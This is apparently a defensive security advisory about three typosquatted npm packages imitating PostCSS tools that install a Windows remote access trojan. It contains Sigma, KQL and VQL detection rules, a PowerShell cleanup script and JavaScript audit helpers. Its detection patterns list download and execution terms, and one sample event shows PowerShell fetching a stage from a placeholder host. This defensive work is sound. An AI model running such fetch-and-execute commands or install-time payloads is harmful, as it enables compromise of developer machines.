Introduction
In June 2026, the software supply chain faced a renewed threat with the discovery of malicious packages published to the npm registry. Security researchers identified three distinct packages—aes-decode-runner-pro, postcss-minify-selector, and postcss-minify-selector-parser—designed to mimic legitimate PostCSS development tools.
While the download counts (ranging from 145 to 615) suggest a targeted or early-stage campaign, the payload is severe: a fully functional Windows Remote Access Trojan (RAT). For defenders, this underscores a critical reality: even low-volume package uploads can result in complete host compromise if they land in a development or build environment. This post provides the technical indicators and defensive playbooks required to identify and eradicate this threat.
Technical Analysis
Affected Platform and Products
- Platform: Windows (The payload is a Windows RAT, though the delivery mechanism is Node.js/npm which runs cross-platform).
- Registry: npm (Node Package Manager).
- Malicious Packages:
  - aes-decode-runner-pro (145 downloads)
  - postcss-minify-selector (256 downloads)
  - postcss-minify-selector-parser (615 downloads)
Vulnerability and Attack Chain
This threat is not a CVE-exploitation event but a Supply Chain Compromise via typosquatting and dependency confusion.
- Initial Compromise: A developer or build agent executes npm install targeting one of the malicious package names.
- Execution: The package's package.json contains pre-install or post-install scripts that trigger automatically upon installation.
- Payload Delivery: These scripts retrieve and execute a Windows binary.
- RAT Installation: The binary establishes a Reverse Shell or C2 (Command and Control) connection, granting the attacker remote access to the Windows host.
Exploitation Status
- Status: Confirmed Active. The packages were published recently and have accumulated confirmed downloads.
- Risk: High. Successful execution leads to full remote control of the developer workstation, potentially allowing lateral movement to the broader corporate network.
Detection & Response
SIGMA Rules
---
title: Potential Malicious npm Package Installation - PostCSS RAT
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects the installation of identified malicious npm packages associated with Windows RAT delivery in June 2026.
references:
    - https://thehackernews.com/2026/06/malicious-npm-packages-pose-as-postcss.html
author: Security Arsenal
date: 2026/06/02
tags:
    - attack.initial_access
    - attack.t1195.002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        # On Windows, npm.cmd is a batch wrapper: process creation shows cmd.exe
        # running npm.cmd and then node.exe running npm-cli.js with the install
        # arguments, so both executables are listed alongside the wrapper names.
        Image|endswith:
            - '\npm.cmd'
            - '\npm.exe'
            - '\cmd.exe'
            - '\node.exe'
        CommandLine|contains:
            - 'aes-decode-runner-pro'
            - 'postcss-minify-selector'
            - 'postcss-minify-selector-parser'
    condition: selection
falsepositives:
    - Legitimate installation of a package with a similar name (unlikely given specific malicious strings)
level: critical
---
title: Suspicious Child Process from Node.js (RAT Activity)
id: b1c2d3e4-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects Node.js spawning suspicious Windows shell commands commonly associated with RAT deployment or execution.
references:
    - https://attack.mitre.org/techniques/T1059/
author: Security Arsenal
date: 2026/06/02
tags:
    - attack.execution
    - attack.t1059.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\node.exe'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\wscript.exe'
        # '/c' matches every cmd.exe /c invocation spawned by node.exe, so this
        # term produces the build-script noise listed under falsepositives.
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadString'
            - 'IEX'
            - '/c'
    condition: selection_parent and selection_child
falsepositives:
    - Legitimate build scripts executing system commands
level: medium
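The two Sigma rules above state their selections declaratively. The following is an added example (not code from the original advisory or from Security Arsenal) that applies the same selection logic in JavaScript to a handful of constructed Windows process-creation events, so the matching semantics can be checked offline: values in a list are OR-ed, map entries in one selection are AND-ed, and Sigma string modifiers on Windows log sources are case-insensitive. The Image list for the first rule also includes cmd.exe and node.exe, because on Windows npm.cmd is a batch wrapper: process creation shows cmd.exe running npm.cmd and then node.exe running npm-cli.js with the install arguments. The event field names, the evaluate() helper and the sample events are assumptions made for this example.

```javascript
// Added example (not from the original advisory): evaluates the selection logic
// of the two Sigma rules over constructed process-creation events.
// Field names mirror the rules: Image, ParentImage, CommandLine.

const MALICIOUS_PACKAGES = [
  'aes-decode-runner-pro',
  'postcss-minify-selector',
  'postcss-minify-selector-parser',
];

// Sigma string modifiers on Windows logsources are case-insensitive, so both sides
// are lower-cased. A missing field never matches.
const endsWithAny = (value, suffixes) =>
  suffixes.some((s) => (value ?? '').toLowerCase().endsWith(s.toLowerCase()));
const containsAny = (value, needles) =>
  needles.some((n) => (value ?? '').toLowerCase().includes(n.toLowerCase()));

// Rule 1: an npm invocation whose command line names one of the malicious packages.
// cmd.exe and node.exe are included because npm.cmd is a wrapper around them (assumption
// explained in the lead-in; the published rule lists only npm.cmd and npm.exe).
function matchesNpmPackageInstall(event) {
  return (
    endsWithAny(event.Image, ['\\npm.cmd', '\\npm.exe', '\\cmd.exe', '\\node.exe']) &&
    containsAny(event.CommandLine, MALICIOUS_PACKAGES)
  );
}

// Rule 2: node.exe spawning a shell/script host with download- or execution-related arguments.
function matchesSuspiciousNodeChild(event) {
  const parentIsNode = endsWithAny(event.ParentImage, ['\\node.exe']);
  const childIsShell = endsWithAny(event.Image, ['\\powershell.exe', '\\cmd.exe', '\\wscript.exe']);
  const suspiciousArgs = containsAny(event.CommandLine, ['Invoke-WebRequest', 'DownloadString', 'IEX', '/c']);
  return parentIsNode && childIsShell && suspiciousArgs;
}

// Runs both rules over a batch of events and returns the alert names raised per event.
function evaluate(events) {
  return events.map((e) => ({
    id: e.id,
    alerts: [
      matchesNpmPackageInstall(e) ? 'npm-malicious-package' : null,
      matchesSuspiciousNodeChild(e) ? 'node-suspicious-child' : null,
    ].filter(Boolean),
  }));
}

// Constructed sample events (not real telemetry).
const SAMPLE_EVENTS = [
  // 1: the wrapper launch of `npm install <malicious package>` as seen by process creation.
  { id: 1, Image: 'C:\\Windows\\System32\\cmd.exe', ParentImage: 'C:\\Windows\\explorer.exe',
    CommandLine: 'cmd.exe /c ""C:\\Program Files\\nodejs\\npm.cmd" install postcss-minify-selector-parser"' },
  // 2: an install script spawning PowerShell to fetch something (placeholder host).
  { id: 2, Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', ParentImage: 'C:\\Program Files\\nodejs\\node.exe',
    CommandLine: 'powershell.exe -NoProfile -Command "Invoke-WebRequest http://example.invalid/stage"' },
  // 3: a benign build step; trips rule 2 only because of the broad '/c' term.
  { id: 3, Image: 'C:\\Windows\\System32\\cmd.exe', ParentImage: 'C:\\Program Files\\nodejs\\node.exe',
    CommandLine: 'cmd.exe /c tsc -p tsconfig.json' },
  // 4: a legitimate install of the real postcss package; no rule should fire.
  { id: 4, Image: 'C:\\Program Files\\nodejs\\node.exe', ParentImage: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'node "C:\\Program Files\\nodejs\\node_modules\\npm\\bin\\npm-cli.js" install postcss' },
];

for (const result of evaluate(SAMPLE_EVENTS)) {
  console.log(`event ${result.id}: ${result.alerts.length ? result.alerts.join(', ') : 'no match'}`);
}
```

Event 3 is the case the second rule's falsepositives entry anticipates: any cmd.exe /c build step spawned by node.exe fires on the '/c' term, so in practice that term is a candidate for tightening or for correlation with an alert from the first rule on the same host.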
KQL (Microsoft Sentinel / Defender)
// Hunt for installations of the specific malicious npm packages
DeviceProcessEvents
| where Timestamp > ago(30d)
| where ProcessCommandLine has_any ("npm install", "npm i")
| where ProcessCommandLine has_any ("aes-decode-runner-pro", "postcss-minify-selector", "postcss-minify-selector-parser")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| extend Severity = "High"
Velociraptor VQL
-- Hunt for the presence of the malicious package directories in node_modules.
-- A recursive ** glob is required: a single "*/" level would miss projects nested
-- under user profiles or source trees. glob() accepts a list, so one query covers
-- all three package names.
SELECT FullPath, Size, Mtime
FROM glob(globs=[
    "C:/**/node_modules/aes-decode-runner-pro",
    "C:/**/node_modules/postcss-minify-selector",
    "C:/**/node_modules/postcss-minify-selector-parser"
])
Remediation Script (PowerShell)
# Remediation Script for Malicious npm Packages (June 2026)
# Requires Administrative Privileges
#Requires -RunAsAdministrator
Write-Host "Starting scan for malicious npm packages..." -ForegroundColor Cyan
$MaliciousPackages = @(
    "aes-decode-runner-pro",
    "postcss-minify-selector",
    "postcss-minify-selector-parser"
)
$FoundThreats = $false
# Scan every filesystem drive for directories carrying a malicious package name.
# Only hits whose parent directory is node_modules are reported, so an unrelated
# folder that happens to share the name is not deleted.
foreach ($Drive in (Get-PSDrive -PSProvider FileSystem)) {
    $DriveRoot = $Drive.Root
    if (-not $DriveRoot) { continue }
    Write-Host "Scanning Drive $DriveRoot..." -ForegroundColor Yellow
    foreach ($Package in $MaliciousPackages) {
        try {
            $DetectedPaths = Get-ChildItem -Path $DriveRoot -Filter $Package -Recurse -Directory -Force -ErrorAction SilentlyContinue |
                Where-Object { $_.Parent.Name -eq 'node_modules' }
            foreach ($Path in $DetectedPaths) {
                $FoundThreats = $true
                Write-Host "[THREAT FOUND] Malicious package detected at: $($Path.FullName)" -ForegroundColor Red
                # Attempt to remove the directory. -ErrorAction Stop turns a failed
                # delete into a terminating error so the catch block actually runs.
                try {
                    Remove-Item -Path $Path.FullName -Recurse -Force -ErrorAction Stop
                    Write-Host "[REMOVED] Successfully deleted: $($Path.FullName)" -ForegroundColor Green
                }
                catch {
                    Write-Host "[ERROR] Failed to delete $($Path.FullName). Manual removal required." -ForegroundColor Red
                }
            }
        }
        catch {
            # Ignore access errors during scan
        }
    }
}
if (-not $FoundThreats) {
    Write-Host "No malicious packages found on local system." -ForegroundColor Green
} else {
    Write-Host "Remediation complete. Please rotate any credentials used on this machine since installation." -ForegroundColor Cyan
}
Remediation
- Immediate Removal: Run the provided PowerShell script to locate and delete the malicious node_modules directories. Alternatively, manually delete the following folders from any project directories:
  - node_modules/aes-decode-runner-pro
  - node_modules/postcss-minify-selector
  - node_modules/postcss-minify-selector-parser
- Sanitize package.json: Audit all package.json files in your environment. Remove any references to these packages under dependencies, devDependencies, or peerDependencies.
- Credential Reset: Since the payload is a Windows RAT, assume that credentials (tokens, SSH keys, browser sessions) may have been exfiltrated. Force a password rotation for the affected accounts and revoke/reissue API keys.
- Re-image Compromised Hosts: If a package installation was successful and the process executed, the most secure remediation is to wipe and re-image the affected Windows workstation. Simply deleting the package files does not guarantee the removal of the RAT's persistence mechanism.
- Dependency Review: Implement a policy requiring manual review or automated approval (using tools like GitHub Dependabot or Snyk) for all new package additions, specifically checking for typosquatting of popular libraries like PostCSS.
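The attack chain section notes that npm runs a package's pre-install or post-install scripts automatically, and the sanitize step above asks for every package.json to be audited. As an added example (not code from the original advisory or from Security Arsenal), the JavaScript below audits a manifest for the three package names under dependencies, devDependencies, peerDependencies and optionalDependencies, lists the lifecycle scripts npm would run at install time, and produces a cleaned manifest with the malicious entries removed. The manifest text, the shape of the findings and the function names are constructed for this example.

```javascript
// Added example (not part of the original advisory): audit a package.json manifest
// for the package names in this advisory and for install-time lifecycle scripts,
// then produce a cleaned copy. The sample manifest below is constructed.

const MALICIOUS_PACKAGES = new Set([
  'aes-decode-runner-pro',
  'postcss-minify-selector',
  'postcss-minify-selector-parser',
]);

// Manifest fields npm resolves and installs from.
const DEPENDENCY_FIELDS = ['dependencies', 'devDependencies', 'peerDependencies', 'optionalDependencies'];

// Lifecycle scripts npm runs automatically, without prompting, when a package is installed.
const INSTALL_SCRIPTS = ['preinstall', 'install', 'postinstall'];

// Returns a list of findings: malicious dependency references and install-time scripts.
function auditManifest(manifestText) {
  const manifest = JSON.parse(manifestText);
  const findings = [];

  for (const field of DEPENDENCY_FIELDS) {
    for (const [name, range] of Object.entries(manifest[field] ?? {})) {
      if (MALICIOUS_PACKAGES.has(name)) {
        findings.push({ kind: 'malicious-dependency', field, name, range });
      }
    }
  }

  // Report what would run on `npm install` so a reviewer sees it before it executes.
  for (const script of INSTALL_SCRIPTS) {
    const command = manifest.scripts?.[script];
    if (command) findings.push({ kind: 'install-script', script, command });
  }

  return findings;
}

// Remediation step: strip the malicious names from every dependency field.
// Returns the cleaned manifest text and how many entries were removed.
function stripMaliciousDependencies(manifestText) {
  const manifest = JSON.parse(manifestText);
  let removed = 0;
  for (const field of DEPENDENCY_FIELDS) {
    for (const name of Object.keys(manifest[field] ?? {})) {
      if (MALICIOUS_PACKAGES.has(name)) {
        delete manifest[field][name];
        removed += 1;
      }
    }
  }
  return { manifestText: JSON.stringify(manifest, null, 2), removed };
}

// Constructed sample: a front-end project that picked up two of the typosquats.
const SAMPLE_MANIFEST = JSON.stringify({
  name: 'example-frontend',
  version: '1.0.0',
  scripts: {
    build: 'postcss src/*.css -d dist',
    postinstall: 'node scripts/setup.js',
  },
  dependencies: { postcss: '^8.4.0', 'postcss-minify-selector-parser': '^1.0.2' },
  devDependencies: { 'aes-decode-runner-pro': '1.0.0', 'postcss-cli': '^11.0.0' },
}, null, 2);

for (const finding of auditManifest(SAMPLE_MANIFEST)) {
  console.log(JSON.stringify(finding));
}
console.log(`removed ${stripMaliciousDependencies(SAMPLE_MANIFEST).removed} malicious dependency entries`);
```

Running auditManifest() over node_modules/<package>/package.json of a suspect dependency shows the exact preinstall, install or postinstall command that package would have executed on this host. Installing with npm install --ignore-scripts (a standard npm option) prevents lifecycle scripts from running at all, which blocks this delivery step for any package at the cost of breaking dependencies that legitimately rely on them.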